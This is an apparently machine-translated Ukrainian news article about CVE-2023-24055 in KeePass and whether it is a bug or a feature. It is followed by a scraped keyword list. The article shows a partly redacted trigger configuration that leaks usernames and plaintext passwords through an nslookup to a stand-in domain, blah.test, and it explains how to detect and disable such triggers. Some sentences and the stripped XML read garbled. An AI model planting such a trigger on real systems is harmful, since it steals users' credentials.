Це були кілька тижнів, які варті новин, для менеджерів паролів – тих зручних утиліт, які допомагають вам придумати інший пароль для кожного веб-сайту, який ви використовуєте, а потім відстежувати їх усі.
Наприкінці 2022 року настала черга LastPass потрапити в усі новини, коли компанія нарешті визнала, що в серпні 2022 року взлам справді закінчився паролем клієнтів сховища викрадають з хмарної служби, де вони були створені резервні копії.
(Самі паролі не були вкрадені, оскільки сховища були зашифровані, а LastPass не мав копій чиїхось «головних ключів» для самих резервних файлів сховища, але це було ближче, ніж більшість людей були раді почути.)
Тоді настала черга LifeLock бути в усіх новинах, коли компанія попередила про те, що виглядало як висип атаки підбору пароля, ймовірно, на основі паролів, викрадених із зовсім іншого веб-сайту, можливо, деякий час тому, і, можливо, нещодавно придбаного в темній мережі.
Сам LifeLock не було зламано, але деякі його користувачі зламали це завдяки поведінці, яка ділиться паролями, спричиненою ризиками, про які вони могли навіть не пам’ятати.
Конкуренти 1Password і BitWarden також нещодавно з’явилися в новинах на основі повідомлень про зловмисну рекламу, яка, очевидно, мимоволі транслювалася Google, яка переконливо заманювала користувачів на копії сторінок входу з метою фішингу даних їхніх облікових записів.
Тепер настала черга KeePass у новинах, цього разу щодо ще однієї проблеми кібербезпеки: нібито вразливість, жаргонний термін, який використовується для позначення програмних помилок, які призводять до прогалин у кібербезпеці, якими зловмисники можуть скористатися у злих цілях.
Винюхування паролів стало простіше
Ми називаємо це а вразливість тут тому, що він має офіційний ідентифікатор помилки, виданий Національним інститутом стандартів і технологій США.
Помилка була дубльована CVE-2023-24055: Зловмисник, який має доступ для запису до файлу конфігурації XML, [може] отримати паролі у відкритому тексті, додавши тригер експорту.
Твердження про можливість отримання відкритих паролів, на жаль, правдиве.
Якщо я маю доступ для запису до ваших особистих файлів, включаючи ваші т.зв %APPDATA%
каталогу, я можу непомітно налаштувати розділ конфігурації, щоб змінити будь-які налаштування KeePass, які ви вже налаштували, або додати налаштування, якщо ви нічого не змінювали свідомо…
…і я можу напрочуд легко викрасти ваші паролі відкритого тексту, або масово, наприклад, створюючи дамп усієї бази даних як незашифрований файл CSV, або коли ви їх використовуєте, наприклад, встановивши «перехоплення програми», яке спрацьовує щоразу, коли ви отримуєте доступ до пароль з бази даних.
Зверніть увагу, що мені не потрібно адміністратор привілеї, оскільки мені не потрібно возитися з фактичним каталогом інсталяції, де зберігається програма KeePass, який зазвичай недоступний для звичайних користувачів
І мені не потрібен доступ до будь-яких заблокованих глобальних налаштувань конфігурації.
Цікаво, що KeePass докладає всіх зусиль, щоб запобігти розпізнаванню ваших паролів, коли ви ними користуєтеся, включно з використанням методів захисту від несанкціонованого доступу, щоб зупинити різні трюки проти кейлоггерів навіть від користувачів, які вже мають повноваження системного адміністратора.
Але програмне забезпечення KeePass також дозволяє напрочуд легко збирати дані паролів у відкритому вигляді, можливо, у спосіб, який ви можете вважати «надто простим» навіть для неадміністраторів.
Використовувати графічний інтерфейс KeePass для створення a Тригер подія, яка запускатиметься кожного разу, коли ви копіюєте пароль у буфер обміну, і налаштовуватиме цю подію на пошук DNS, який містить і ім’я користувача, і відкритий текстовий пароль:
Тоді ми могли б скопіювати не дуже очевидне налаштування XML для цієї опції з нашого власного локального конфігураційного файлу в конфігураційний файл іншого користувача в системі, після чого вони також виявили б, що їхні паролі просочуються через Інтернет через DNS-пошук.
Незважаючи на те, що дані конфігурації XML значною мірою читаються та інформативні, KeePass цікаво використовує рядки випадкових даних, відомі як GUID (скорочення від глобально унікальні ідентифікатори) для позначення різноманітних Тригер налаштувань, тож навіть добре обізнаному користувачеві знадобиться розширений список посилань, щоб зрозуміти, які тригери встановлено та як.
Ось як виглядає наш ініціатор витоку DNS, хоча ми відредагували деякі деталі, щоб ви не могли одразу скопіювати та вставити цей текст безпосередньо:
XXXXXXXXXXXXXXXXXXXXX Копія Крадіть речі через DNS-пошук XXXXXXXXXXXXXXXXXXXXX 0XXXXXXXXXXXXXXXXXXXXX nslookup XXXXX.XXXXX.blah.test правда 1
Коли цей тригер активний, доступ до пароля KeePass спричиняє витік відкритого тексту під час ненав’язливого пошуку DNS у домен за моїм вибором, який є blah.test
у цьому прикладі.
Зауважте, що реальні зловмисники майже напевно зашифрували б або замаскували вкрадений текст, що не тільки ускладнило б виявлення витоку DNS, але й подбало б про паролі, які містять символи, відмінні від ASCII, наприклад літери з акцентами чи емодзі, які інакше не можна використовувати в іменах DNS:
Але чи справді це помилка?
Однак складне питання полягає в тому, «Це справді помилка, чи це просто потужна функція, якою може зловживати хтось, кому вже потрібен принаймні такий же контроль над вашими особистими файлами, як і вам самим?»
Простіше кажучи, чи є це вразливістю, якщо хтось, хто вже контролює ваш обліковий запис, може возитися з файлами, до яких ваш обліковий запис має мати доступ?
Навіть якщо ви можете сподіватися, що менеджер pssword включатиме багато додаткових рівнів захисту від втручання, щоб ускладнити зловживання помилками/функціями такого роду, слід CVE-2023-24055 справді бути вразливістю в списку CVE?
Якщо так, то хіба такі команди, як DEL
(видалити файл) і FORMAT
також повинні бути «помилки»?
І хіба сама наявність PowerShell, яка робить потенційно небезпечну поведінку набагато легшою для провокації (спробуйте powerhsell get-clipboard
, наприклад), бути самостійним уразливим місцем?
Це позиція KeePass, яка підтверджується наступним текстом, який було додано до деталь «помилка». на веб-сайті NIST:
** СПОРІВНО ** […] ПРИМІТКА: позиція постачальника полягає в тому, що база даних паролів не призначена для захисту від зловмисників, які мають такий рівень доступу до локального ПК.
Що ж робити?
Якщо ви автономний користувач KeePass, ви можете перевірити наявність шахрайських тригерів, таких як «DNS Stealer», який ми створили вище, відкривши програму KeePass і переглянувши Tools > Тригери… вікно:
Зверніть увагу, що ви можете перевернути все Тригер систему з цього вікна, просто знявши прапорець [ ] Enable trigger system
варіант…
…але це не глобальне налаштування, тому його можна знову ввімкнути через ваш локальний конфігураційний файл, і тому він захищає вас лише від помилок, а не від зловмисників, які мають доступ до вашого облікового запису.
Ви можете примусово вимкнути цю опцію для всіх на комп’ютері, не маючи можливості знову ввімкнути її самостійно, змінивши файл глобального блокування KeePass.config.enforced.XML
, що знаходиться в каталозі, де встановлено програму.
Тригери буде примусово вимкнено для всіх, якщо ваш глобальний XML-файл примусового виконання виглядає так:
помилковий
(Якщо вам цікаво, зловмисник, який має доступ на запис до каталогу програми, щоб скасувати цю зміну, майже напевно матиме достатньо потужностей на системному рівні, щоб змінити сам виконуваний файл KeePass або все одно встановити та активувати автономний кейлоггер.)
Якщо ви адміністратор мережі, якому доручено блокувати KeePass на комп’ютерах ваших користувачів, щоб він залишався достатньо гнучким, щоб допомогти їм, але недостатньо гнучким, щоб вони могли помилково допомогти кіберзлочинцям, рекомендуємо прочитати KeePass питання безпеки стор Тригери сторінка, і Примусова конфігурація стр.
- Розповсюдження контенту та PR на основі SEO. Отримайте посилення сьогодні.
- Платоблокчейн. Web3 Metaverse Intelligence. Розширені знання. Доступ тут.
- джерело: https://nakedsecurity.sophos.com/2023/02/01/password-stealing-vulnerability-reported-in-keypass-bug-or-feature/
- 1
- 2022
- 70
- a
- Здатний
- МЕНЮ
- вище
- абсолют
- доступ
- доступ до
- рахунки
- активний
- доданий
- зізнався
- оголошення
- після
- проти
- ВСІ
- нібито
- вже
- та
- Інший
- додаток
- додаток
- Серпня
- автор
- автоматичний
- назад
- підтриманий
- фонове зображення
- резервна копія
- заснований
- оскільки
- буття
- border
- дно
- порушення
- Помилка
- помилки
- захоплення
- який
- випадок
- викликаний
- Причини
- Центр
- звичайно
- зміна
- символи
- перевірка
- вибір
- стверджувати
- ближче
- хмара
- color
- Приходити
- компанія
- повністю
- комп'ютер
- комп'ютери
- Умови
- конфігурація
- Вважати
- контроль
- copies
- може
- обкладинка
- створювати
- створений
- cve
- кіберзлочинці
- Кібербезпека
- Небезпечний
- темно
- Dark Web
- дані
- Database
- деталі
- DID
- різний
- безпосередньо
- дисплей
- DNS
- домен
- Не знаю
- вниз
- охрестили
- легше
- легко
- або
- зашифрованих
- примус
- досить
- Весь
- Навіть
- Event
- Кожен
- все
- приклад
- Експлуатувати
- експорт
- обширний
- додатково
- особливість
- кілька
- філе
- Файли
- в кінці кінців
- знайти
- гнучкий
- після
- Примусово
- знайдений
- від
- отримати
- отримання
- Глобальний
- йде
- мобільний
- щасливий
- має
- висота
- допомога
- тут
- Отвори
- надія
- hover
- Як
- Однак
- HTML
- HTTPS
- ідентифікатор
- Негайний
- in
- включати
- включені
- У тому числі
- інформативний
- встановлювати
- екземпляр
- Інститут
- інтернет
- питання
- Випущений
- IT
- сам
- жаргон
- тримати
- відомий
- в значній мірі
- LastPass
- шарів
- вести
- витік
- Витоку
- рівень
- список
- місцевий
- подивився
- ВИГЛЯДИ
- пошук
- made
- зробити
- РОБОТИ
- менеджер
- Менеджери
- Маржа
- макс-ширина
- може бути
- помилка
- помилки
- змінювати
- найбільш
- Імена
- National
- Необхідність
- мережу
- новини
- nist
- нормальний
- отримувати
- офіційний
- відкриття
- варіант
- інакше
- власний
- параметр
- Пароль
- Паролі
- Пол
- PC
- Люди
- може бути
- персонал
- phishing
- Простий текст
- plato
- Інформація про дані Платона
- PlatoData
- положення
- Пости
- потенційно
- влада
- потужний
- повноваження
- PowerShell
- приватний
- привілеї
- ймовірно
- програма
- придбано
- цілей
- put
- питання
- випадковий
- висип
- читання
- нещодавно
- рекомендувати
- регулярний
- запам'ятати
- відповідь
- Повідомляється
- Звіти
- зворотний
- ризики
- прогін
- розділ
- безпечний
- сенс
- обслуговування
- комплект
- установка
- налаштування
- Короткий
- Повинен
- просто
- So
- Софтвер
- solid
- деякі
- Хтось
- Spot
- автономні
- стандартів
- Як і раніше
- вкрали
- Стоп
- зберігати
- такі
- передбачуваний
- SVG
- система
- Приймати
- методи
- Технологія
- Команда
- їх
- самі
- отже
- через
- час
- до
- занадто
- топ
- трек
- перехід
- прозорий
- викликати
- правда
- ПЕРЕГЛЯД
- Опинився
- типово
- створеного
- URL
- us
- використання
- користувач
- користувачі
- комунальні послуги
- різний
- склеп
- склепіння
- через
- вразливість
- W3
- способи
- Web
- веб-сайт
- тижня
- Що
- який
- ВООЗ
- волі
- цікаво
- Work
- б
- запис
- XML
- вашу
- себе
- зефірнет